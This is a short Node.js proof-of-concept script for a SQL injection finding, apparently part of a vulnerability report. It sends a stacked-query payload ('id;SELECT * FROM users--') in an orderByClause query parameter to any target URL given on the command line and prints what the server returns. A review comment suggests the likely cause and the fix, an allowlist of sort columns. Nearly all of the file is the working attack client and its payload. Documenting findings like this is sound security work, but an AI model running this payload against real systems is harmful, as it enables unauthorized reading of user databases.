README.md
const axios = require('axios');
// Proof-of-concept client for a SQL injection finding: it issues one GET
// request that carries caller-supplied text in the `orderByClause` query
// parameter and prints whatever the server sends back.
//
// NOTE(review): the server side is not shown here. The finding presumably
// comes from `orderByClause` being concatenated into an ORDER BY fragment;
// confirm against the handler. Bind parameters cannot stand in for column
// names, so the usual remediation is to map the requested sort key onto a
// fixed allowlist of columns and directions and reject everything else.
const [, , endpoint, suppliedClause] = process.argv;

// An absent or empty second argument falls back to the built-in sample value.
const orderByValue = suppliedClause || 'id;SELECT * FROM users--';

if (!endpoint) {
  const usageLines = [
    'Usage: node exploit.js <target_url> [payload]',
    'Example: node exploit.js http://<TARGET-HERE>/api/v1/external-users "id;SELECT * FROM users--"',
  ];
  for (const line of usageLines) {
    console.error(line);
  }
  process.exit(1);
}

/**
 * Print the outcome of a failed request.
 *
 * When the server answered with an error status, the status code and body are
 * shown; otherwise (no response at all) only the error message is available.
 *
 * @param {object} error - The error thrown by the axios call.
 */
function reportFailure(error) {
  console.error('\n[-] Request Failed:');
  if (!error.response) {
    console.error(error.message);
    return;
  }
  console.error(`Status: ${error.response.status}`);
  console.error(error.response.data);
}

/**
 * Send the single request and print the response body unmodified.
 *
 * The value is passed through axios `params`, which serialises it into the
 * query string; nothing else about the request is customised.
 *
 * @returns {Promise<void>} Resolves after the response or the failure has been printed.
 */
async function sendProbe() {
  try {
    console.log(`\n[*] Attempting SQL Injection on ${endpoint} with payload: "${orderByValue}"`);
    const query = { orderByClause: orderByValue };
    const reply = await axios.get(endpoint, { params: query });
    console.log('\n[+] Server Response:');
    console.log(reply.data);
  } catch (error) {
    // Failures are reported, not rethrown, so the process still ends normally.
    reportFailure(error);
  }
}

sendProbe();